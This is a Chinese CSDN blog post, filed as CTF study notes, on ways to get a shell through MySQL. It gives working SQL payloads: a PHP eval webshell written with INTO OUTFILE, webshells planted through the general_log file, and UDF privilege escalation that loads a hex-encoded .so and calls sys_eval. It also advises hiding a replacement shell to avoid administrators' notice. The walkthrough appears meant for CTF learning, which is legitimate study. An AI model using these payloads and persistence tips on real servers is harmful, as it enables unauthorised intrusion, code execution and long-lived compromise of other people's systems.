关于MySQL的几种getshell

已于 2024-02-06 01:22:23 修改
阅读量895 收藏 21
点赞数 9
分类专栏: CTF学习笔记 文章标签: mysql android adb
于 2024-02-01 16:18:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NYG694/article/details/135975160
版权

1.MySQL远程读取文件漏洞

场景介绍:当靶机拥有连接数据库功能时,我们在自己服务器上开启数据库服务,下载脚本
监听脚本
用python2运行
在这里插入图片描述
至于读取什么文件就更改filelist就可以了。
这里要注意靶机连接上后要执行一次命令才会交互发送消息过来。

2.MySQL几种写马方式

1.基于直接写入根目录
show global variables like '%secure%';
适用场景:
1.secure_file_priv设置为空;
2.有文件可写权限

select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/shell.php"

知识点拓展

> outfile和dumpfile的区别

outfile:

1、 支持多行数据同时导出

2、 使用union联合查询时,要保证两侧查询的列数相同

3、 会在换行符制表符后面追加反斜杠

4、会在末尾追加换行

dumpfile:

1、 每次只能导出一行数据

2、 不会在换行符制表符后面追加反斜杠

3、 不会在末尾追加换行

因此,我们可以使用into dumpfile这个函数来顺利写入二进制文件;

当然into outfile函数也可以写入二进制文件,只是最终无法生效罢了(追加的反斜杠会使二进制文件无法生效)

如果服务器端本身的查询语句,结果有多行,但是我们又想使用dump file,应该手动添加 limit 限制

2.日志写入

第一步:
show variables like '%general%';
查看日志位置和权限
在这里插入图片描述
开启监测:
set global general_log = on;

第二步:设置路径
set global general_log_file = ‘/var/www/html/1.php’;

第三步:写马
查询一个一句话木马:(这时log日志里就会记录这个一句话木马。)
select ‘<?php eval($_POST[‘NYG’]);?>’;

拓展攻击:

慢查询补充
因为是用的慢查询日志,所以说只有当查询语句执行的时间要超过系统默认的时间时,该语句才会被记入进慢查询日志。 一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。

如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中

show global variables like '%long_query_time%'

–查看服务器默认时间值
通常情况下执行sql语句时的执行时间一般不会超过10s,所以说这个日志文件应该是比较小的,而且默认也是禁用状态,不会引起管理员的察觉

拿到shell后上传一个新的shell,删掉原来shell,新shell做隐藏,这样shell可能还能活的时间长些

像这种东西还是比较适合那些集成环境,比如,appserv,xampp…因为权限全部都映射到同一个系统用户上了,如果是win平台,权限通常都比较高
其它方法:通过构造联合查询语句得到网站管理员的账户和密码,然后扫后台登录后台,找上传点 GetShell

三.udf提权拿到root权限

当没法利用以上方法时,就可以使用这个方法
第一步:
show global variables like '%plugin%';
plugin_dir 选项用于指定插件目录
在这里插入图片描述
将有毒的so文件写进插件里就会自动进行加载

# 直接 SELECT 查询十六进制写入
SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

这里so文件如何获取,可以到sqlmap里面的|data\udf\mysql里面找有分类好的
在这里插入图片描述
或是网上搜寻一下
so文件
这里的十六进制怎么获取呢?可以利用 MySQL 自带的 hex 函数来编码:

直接传入路径编码

SELECT hex(load_file('/lib_mysqludf_sys_64.so'));

也可以将路径 hex 编码

SELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f));
一般为了更方便观察,可以将编码后的结果导入到新的文件中方便观察:

SELECT hex(load_file('/lib_mysqludf_sys_64.so')) into dumpfile '/tmp/udf.txt'; 

SELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f)) into dumpfile '/tmp/udf.txt';

可以看到
在这里插入图片描述
提供一个脚本收纳
好东西

第二步
创建函数
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
使用
select sys_eval('env');

引用博客
狼组安全团队
MySQL文件读取
国光
感谢大佬的知识分享,希望大家都能有所学习领悟,共同进步。

N1_WEB
关注
  • 9
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql自动化部署shell脚本
10-26
mysql自动化部署shell脚本
shell简单处理mysql查询结果的方法
09-09
今天小编就为大家分享一篇shell简单处理mysql查询结果的方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Mysql数据库getshell方法
最新发布
weixin_68408599的博客
04-02 1059
今天摸鱼时候,突然有人问我不同的数据库getshell的方式,一时间我想到了mysql还有redis未授权访问到getshell的方式,但是仅仅第一时间只想到了这两种,我有查了查资料,找到了上面两种数据库getshell的补充,以及其他数据库getshell的方式。因此更新一个专栏,各个数据库getshell的方式。
Mysql Update批量更新的几种方式
09-09
今天小编就为大家分享一篇关于Mysql Update批量更新的几种方式,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
MySQL使用XtraBackup的shell脚本介绍
12-14
mysql_backup.sh是关于MySQL的一个使用XtraBackup做备份的shell脚本,实现了简单的完整备份和增量备份、以及邮件发送备份信息等功能。功能目前还比较简单,后续将继续完善和增加相关功能。参考了网上MySQL备份的脚本,如有不足的地方,欢迎大家拍砖!   1: 使用前,请先做一些配置选项修改,例如备份路径设置、连接数据库的账号密码等等。   2: 在BACKUP_DIR目录下,创建full、incr、logs、scripts四个目录,将mysql_backup.sh放置在scripts目录下。 #!/bin/bash #######################
Mysql Getshell总结
qq_51478862的博客
05-05 7923
获取网站根目录方式 (1) phpinfo() 页面:最理想的情况,直接显示web路径 (2) web报错信息:可以通过各种fuzz尝试让目标报错,也有可能爆出绝对路径 (3) 一些集成的web框架:如果目标站点是利用phpstudy、LAMPP等之类搭建的,可以猜测默认路径或者通过查看数据库保存的路径默认路径 winserver的iis默认路径c:\Inetpub\wwwroot linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr.
MySQL写Shell方法总结
做自己喜欢的事,并将其发挥到极致!
12-31 4625
MySQL注入点,用工具对目标站点写入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile 写Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `写入的那个路径要有写入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
mysqlgetshell的方式
unexpectedthing的博客
03-17 4452
文章目录outfile和dumpfile写shell利用条件基于union联合查询:非联合查询outfile和dumpfile的区别secure_file_prive日志getshell慢日志getshell利用general_logbinlog的介绍 outfile和dumpfile写shell 利用条件 数据库当前用户为root权限; 知道当前网站的绝对路径; PHP的GPC为 off状态;(魔术引号,GET,POST,Cookie) 写入的那个路径存在写入权限。 基于union联合查询: ?i
mysql怎么getshell_phpMyAdmin新姿势getshell
weixin_35249165的博客
02-02 468
0x00 设想假设我们拥有MySQL的root权限,登录Web端的phpMyAdmin数据库管理控制台,你有多少种方法去getshell?本文旨在研究新的方法,如果在INTO OUTFILE禁用的情况下,或许会少很多思路了。这里的禁用是完全(权限)禁用,而不是拦截行为。0x01 常规方法测试好了,入正题,我目前拥有一台WIN XP虚拟机,上面的服务如下:Apache 2.4.23(此环境与本文实现...
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
Mysql漏洞利用(越权,实战怎么从低权限拿到root密码)
07-30
Mysql漏洞利用(越权,实战怎么从低权限拿到root密码)
技术分享 | MySQL Shell 运行 SQL 的两种内置方法概述
ActionTech的博客
10-31 782
作者:杨涛涛资深数据库专家,专研 MySQL 十余年。擅长 MySQL、PostgreSQL、MongoDB 等开源数据库相关的备份恢复、SQL 调优、监控运维、高可用架构设计等。目前任职于爱可生,为各大运营商及银行金融企业提供 MySQL 相关技术支持、MySQL 相关课程培训等工作。本文来源:原创投稿*爱可生开源社区出品,原创内容未经授权不得随意使用,转载请联系小编并注明来源。
phpMyAdmin 4.8.1后台文件包含漏洞Getshell的几种姿势
qq_45521281的博客
04-27 2327
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响。 登陆phpmyadmin后台: 访问 http://192.168.0.13...
MYSQL注入|文件读写|获取敏感信息|上传getshell|绕过宽字节、magic_quotes_gpc
BING
04-09 3892
文章目录1.SQL注入的思维导图2.MYSQL注入思维导图3.文件读写获取路径常见方法(1).报错显示(2).遗留文件(3).漏洞报错(4).平台配置文件(5). 爆破文件读写函数(1)load_file():读取函数(2)into outfile或iinto dumpfile:导出函数写入WebShell的几种方式 1.SQL注入的思维导图 2.MYSQL注入思维导图 3.文件读写 文件读写操作: load_file():读取函数 into outfile或iinto dumpfile:导出函数 会用
phpmyadmin getshell的四种方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-20 1700
phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE3、慢查询写入webshell4、创建数据库和表写入webshell: 1、日志文件写 shell(phpmyadmin getshell的四种方法) general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell
MySql注入到GetShell
Williamanddog的博客
01-17 531
mysql数据库中存在mysql select into outfile命令,该命令的作用是将被选择的一行写入一个文件。(2)要有mysql file权限(即能否对系统的文件读取和写操作),默认情况下只有root权限有。在配置文件中,我们可以看到数据库的用户名为root,密码为p@ssw0rd。(3)对目录要有写权限,一般image之类的存放图片的目录有写权限。还要注意:写的文件名一定是在网站中不存在的,不然会失败。然后我们通过蚁剑的数据连接就可以进入数据库。然后我们进入config目录查看配置文件。
phpMyAdmin(mysql)常见的写shell方法及版本漏洞汇总
m0_48108919的博客
02-21 7582
目录 前言 一、查看phpMyAdmin版本 二、phpmyadmin常见的getshell方法 1.前提 2.网站物理路径获取方法 3.通过into outfile getshell 4.通过日志文件写 shell 5.通过慢查询写shell 6.创建数据库和表写入webshell 总结 前言 phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具 。 一、查看phpMyAdmin版本 phpMyAdmin是有很多公开漏
centos7安装mysql的几种方法
09-09
在CentOS 7上安装MySQL有几种方法。一种方法是通过使用YUM包管理器来安装MySQL。首先,您需要检查是否已安装MySQL服务,可以使用以下命令: ``` yum list installed mysql* rpm -qa|grep mysql* ``` 如果已安装MySQL服务,请先卸载和删除它。然后,您可以使用以下命令安装MySQL: ``` yum localinstall mysql-community-client-5.7.14-1.el7.x86_64.rpm mysql-community-server-5.7.14-1.el7.x86_64.rpm mysql-community-libs-5.7.14-1.el7.x86_64.rpm mysql-community-common-5.7.14-1.el7.x86_64.rpm ``` 另一种方法是通过下载RPM包来安装MySQL。您可以使用以下命令下载MySQL RPM包: ``` rpm -ivh https://dev.mysql.com/get/mysql80-community-release-el7-3.noarch.rpm ``` 这将通过RPM包管理器安装MySQL

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值